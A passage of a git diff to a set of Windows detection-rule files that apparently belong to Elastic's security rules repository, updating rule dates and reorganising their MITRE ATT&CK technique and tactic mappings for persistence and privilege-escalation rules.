"Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" reference = "https://attack.mitre.org/techniques/T1036/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_services_registry.toml b/rules/windows/persistence_services_registry.toml index e142ec77150..4907ef082e4 100644 --- a/rules/windows/persistence_services_registry.toml +++ b/rules/windows/persistence_services_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/10/07" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -117,31 +117,41 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_suspicious_com_hijack_registry.toml b/rules/windows/persistence_suspicious_com_hijack_registry.toml index 7fa5626eea9..30186fd049e 100644 --- a/rules/windows/persistence_suspicious_com_hijack_registry.toml +++ b/rules/windows/persistence_suspicious_com_hijack_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -154,48 +154,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.015" name = "Component Object Model Hijacking" reference = "https://attack.mitre.org/techniques/T1546/015/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.015" -name = "Component Object Model Hijacking" -reference = "https://attack.mitre.org/techniques/T1546/015/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml index fcea266ea46..288d3035d09 100644 --- a/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml +++ b/rules/windows/persistence_suspicious_image_load_scheduled_task_ms_office.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -147,36 +147,36 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml index ed301eb30bb..9a17c463d7f 100644 --- a/rules/windows/persistence_suspicious_scheduled_task_runtime.toml +++ b/rules/windows/persistence_suspicious_scheduled_task_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -122,36 +122,81 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" +id = "T1127" +name = "Trusted Developer Utilities Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" +id = "T1127.001" +name = "MSBuild" +reference = "https://attack.mitre.org/techniques/T1127/001/" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.002" +name = "Control Panel" +reference = "https://attack.mitre.org/techniques/T1218/002/" +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[[rule.threat.technique]] +id = "T1220" +name = "XSL Script Processing" +reference = "https://attack.mitre.org/techniques/T1220/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml index e3c5bf98f82..5706fc3e315 100644 --- a/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml +++ b/rules/windows/persistence_suspicious_user_mandatory_profile_file.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/07" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,27 +86,31 @@ file where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.001" +name = "Registry Run Keys / Startup Folder" +reference = "https://attack.mitre.org/techniques/T1547/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] +[[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_system_shells_via_services.toml b/rules/windows/persistence_system_shells_via_services.toml index 2a0d907bce6..a3b0b221fdb 100644 --- a/rules/windows/persistence_system_shells_via_services.toml +++ b/rules/windows/persistence_system_shells_via_services.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -120,27 +120,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -151,10 +154,17 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_temp_scheduled_task.toml b/rules/windows/persistence_temp_scheduled_task.toml index fbc8a28fda9..9ec575d97b2 100644 --- a/rules/windows/persistence_temp_scheduled_task.toml +++ b/rules/windows/persistence_temp_scheduled_task.toml @@ -2,7 +2,7 @@ creation_date = "2022/08/29" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -74,36 +74,18 @@ sequence by winlog.computer_name, winlog.event_data.TaskName with maxspan=5m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_time_provider_mod.toml b/rules/windows/persistence_time_provider_mod.toml index 7b99257a7d9..d4d2d46de13 100644 --- a/rules/windows/persistence_time_provider_mod.toml +++ b/rules/windows/persistence_time_provider_mod.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/19" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -137,36 +137,23 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.003" name = "Time Providers" reference = "https://attack.mitre.org/techniques/T1547/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.003" -name = "Time Providers" -reference = "https://attack.mitre.org/techniques/T1547/003/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml index 708d2187cb4..9143335a022 100644 --- a/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml +++ b/rules/windows/persistence_user_account_added_to_privileged_group_ad.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/04/24" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Skoetting"] @@ -102,14 +102,18 @@ iam where host.os.type == "windows" and event.action == "added-member-to-group" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_user_account_creation.toml b/rules/windows/persistence_user_account_creation.toml index 2bab46a9d12..5fff35a5c75 100644 --- a/rules/windows/persistence_user_account_creation.toml +++ b/rules/windows/persistence_user_account_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -87,19 +87,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" + [[rule.threat.technique.subtechnique]] id = "T1136.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1136/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1136.002" +name = "Domain Account" +reference = "https://attack.mitre.org/techniques/T1136/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/windows/persistence_via_application_shimming.toml b/rules/windows/persistence_via_application_shimming.toml index 1fb717e1aa7..78c51316c02 100644 --- a/rules/windows/persistence_via_application_shimming.toml +++ b/rules/windows/persistence_via_application_shimming.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -101,36 +101,18 @@ process where host.os.type == "windows" and event.type == "start" and process.na [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" + [[rule.threat.technique.subtechnique]] id = "T1546.011" name = "Application Shimming" reference = "https://attack.mitre.org/techniques/T1546/011/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" -[[rule.threat.technique.subtechnique]] -id = "T1546.011" -name = "Application Shimming" -reference = "https://attack.mitre.org/techniques/T1546/011/" - - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_hidden_run_key_valuename.toml b/rules/windows/persistence_via_hidden_run_key_valuename.toml index 1d217e04fb3..249be5b3caf 100644 --- a/rules/windows/persistence_via_hidden_run_key_valuename.toml +++ b/rules/windows/persistence_via_hidden_run_key_valuename.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows", "crowdstrike", "sentinel_one_cloud_funnel", "m365_defender"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -97,43 +97,49 @@ registry where host.os.type == "windows" and event.type == "change" and length(r [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1106" name = "Native API" reference = "https://attack.mitre.org/techniques/T1106/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml index 5ce887dd079..cd8b93affc2 100644 --- a/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml +++ b/rules/windows/persistence_via_telemetrycontroller_scheduledtask_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -96,46 +96,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" + [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" - [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml index 4c77031fe53..5460a9a109a 100644 --- a/rules/windows/persistence_via_update_orchestrator_service_hijack.toml +++ b/rules/windows/persistence_via_update_orchestrator_service_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -147,36 +147,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" +[[rule.threat.technique]] +id = "T1574" +name = "Hijack Execution Flow" +reference = "https://attack.mitre.org/techniques/T1574/" +[[rule.threat.technique.subtechnique]] +id = "T1574.011" +name = "Services Registry Permissions Weakness" +reference = "https://attack.mitre.org/techniques/T1574/011/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml index df5ba00f618..ab9056795e5 100644 --- a/rules/windows/persistence_via_wmi_stdregprov_run_services.toml +++ b/rules/windows/persistence_via_wmi_stdregprov_run_services.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/03" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -170,41 +170,61 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.001" +name = "Logon Script (Windows)" +reference = "https://attack.mitre.org/techniques/T1037/001/" + +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" + [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1547.004" +name = "Winlogon Helper DLL" +reference = "https://attack.mitre.org/techniques/T1547/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/persistence_webshell_detection.toml b/rules/windows/persistence_webshell_detection.toml index 9999667d1d4..133006547ec 100644 --- a/rules/windows/persistence_webshell_detection.toml +++ b/rules/windows/persistence_webshell_detection.toml @@ -2,7 +2,7 @@ creation_date = "2021/08/24" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/01/02" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -153,35 +153,38 @@ value = "*?:\\\\Program Files (x86)\\\\*" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1505" name = "Server Software Component" reference = "https://attack.mitre.org/techniques/T1505/" + [[rule.threat.technique.subtechnique]] id = "T1505.003" name = "Web Shell" reference = "https://attack.mitre.org/techniques/T1505/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -191,6 +194,7 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -206,14 +210,15 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line"] diff --git a/rules/windows/persistence_werfault_reflectdebugger.toml b/rules/windows/persistence_werfault_reflectdebugger.toml index 10b36a1c675..fe4ec754836 100644 --- a/rules/windows/persistence_werfault_reflectdebugger.toml +++ b/rules/windows/persistence_werfault_reflectdebugger.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -89,26 +89,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.012" +name = "Image File Execution Options Injection" +reference = "https://attack.mitre.org/techniques/T1546/012/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1112" name = "Modify Registry" reference = "https://attack.mitre.org/techniques/T1112/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/privilege_escalation_credroaming_ldap.toml b/rules/windows/privilege_escalation_credroaming_ldap.toml index 50b903484bb..27303266a55 100644 --- a/rules/windows/privilege_escalation_credroaming_ldap.toml +++ b/rules/windows/privilege_escalation_credroaming_ldap.toml @@ -2,7 +2,7 @@ creation_date = "2022/11/09" integration = ["system", "windows"] maturity = "production" -updated_date = "2025/11/14" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -98,14 +98,18 @@ event.code:"5136" and host.os.type:"windows" and winlog.event_data.AttributeLDAP [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1068" name = "Exploitation for Privilege Escalation" reference = "https://attack.mitre.org/techniques/T1068/" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules/windows/privilege_escalation_disable_uac_registry.toml b/rules/windows/privilege_escalation_disable_uac_registry.toml index 8d113e3b967..dc3a6bd371b 100644 --- a/rules/windows/privilege_escalation_disable_uac_registry.toml +++ b/rules/windows/privilege_escalation_disable_uac_registry.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = 